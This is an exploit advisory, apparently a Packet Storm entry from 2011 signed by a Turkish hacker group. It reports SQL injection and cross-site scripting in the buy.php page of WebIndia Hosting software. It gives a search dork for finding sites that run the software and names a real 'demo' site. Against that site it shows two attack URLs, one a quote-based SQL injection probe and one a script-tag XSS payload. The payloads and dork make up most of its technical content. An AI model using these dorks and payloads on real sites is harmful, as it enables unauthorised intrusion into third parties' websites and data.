WebIndia Hosting Cross Site Scripting / SQL Injection

2011-12-06T00:00:00
ID PACKETSTORM:107563
Type packetstorm
Reporter 3spi0n
Modified 2011-12-06T00:00:00

Description

                                        
                                            `# Exploit Title: WebIndia Hosting Multiple Vulnerability  
# Date: 06.12.2011 - 17:55  
# Author: 3spi0n  
# Software Website: http://www.newindiahosting.com/  
# Tested On: BackTrack 5 - Win7 Ultimate  
# Platform: Php  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
[$] Dorks: "Powered by New India Hosting"  
  
[#] Vulnerable File : | buy.php |  
  
[$] Demo Sites:  
  
[~] http://mcxchakraa.com/buy.php?Id=1" [PhpSQLi]  
[~] http://mcxchakraa.com/buy.php?Id=<script>alert('XSS')</script> [XSS]  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
# Dar bi Koridor Benimki, Kendimi Aradigim.  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
# Contact: Twitter.Com/RigidusCO - Facebook.Com/3spi0ne  
  
# Greetz: DarkDevilz.in - 3spi0n.net  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
- Mr.PaPaRoSSe And 3spi0n -  
  
# DarkDevilz - Defence And Destruction Group'z - TURKEY #  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
`